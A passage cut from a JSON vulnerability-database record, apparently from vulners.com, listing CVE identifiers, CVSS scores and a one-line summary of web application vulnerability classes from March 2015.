"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9057", "CVE-2015-1165", "CVE-2015-1220", "CVE-2015-1218", "CVE-2015-1214", "CVE-2015-2275", "CVE-2015-1223", "CVE-2015-1231", "CVE-2015-1217", "CVE-2015-1592", "CVE-2015-1213", "CVE-2014-9472", "CVE-2015-1227", "CVE-2015-1464", "CVE-2015-2062", "CVE-2015-1228", "CVE-2015-1224", "CVE-2015-1215", "CVE-2015-1222", "CVE-2013-2184", "CVE-2014-8487", "CVE-2015-1219", "CVE-2015-1229", "CVE-2015-1221", "CVE-2015-1216", "CVE-2015-1238", "CVE-2015-1230", "CVE-2015-1306", "CVE-2015-1026"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-03-23T00:00:00", "published": "2015-03-23T00:00:00", "id": "SECURITYVULNS:VULN:14346", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14346", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
